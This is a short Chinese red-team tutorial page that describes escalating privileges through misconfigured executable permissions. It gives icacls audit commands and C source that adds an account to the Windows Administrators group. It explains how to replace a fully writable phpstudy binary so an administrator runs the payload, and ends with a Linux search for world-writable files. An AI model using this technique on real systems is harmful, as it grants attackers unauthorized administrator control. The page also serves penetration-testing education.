1. 首页
  2. 红队技术

利用配置不当提权

利用管理员对服务器的权限分配不当完成的权限提升(开发者的意识不够强)

一般情况下面 普通用户对程序是没有控制权的

icacls  
icacls c:\windows\*.exe /save perm /T 
i586-mingw32msvc-gcc -o admin.exe admin.c   (因为exe要给windows用所以这里使用i586-mingw32msvc-gcc这个编译

然后在c盘更目录下面生成了 asd文件 我们用记事本查看 就可以知道每一个exe的权限

但是很遗憾这种情况没有找到

我们看一下我们需要的脚本

#include<stdlib.h&gt;
int main()
{
  int i;
  i=system("net localgroup administrators a /add");
  return 0;
}

这里为了满足实验要求 我们这里加一个普通用户

这里我们以phpstudy为例子 user配置不当 对他的操作是 完全控制

把我们刚才上传的exe改名为这个

然后当管理点击这个的时候 就是默认吧a加入管理员组

那么在liunx如何提权呐???

find / -perm 777 -exec ls -l {} \

原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/archives/3213

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息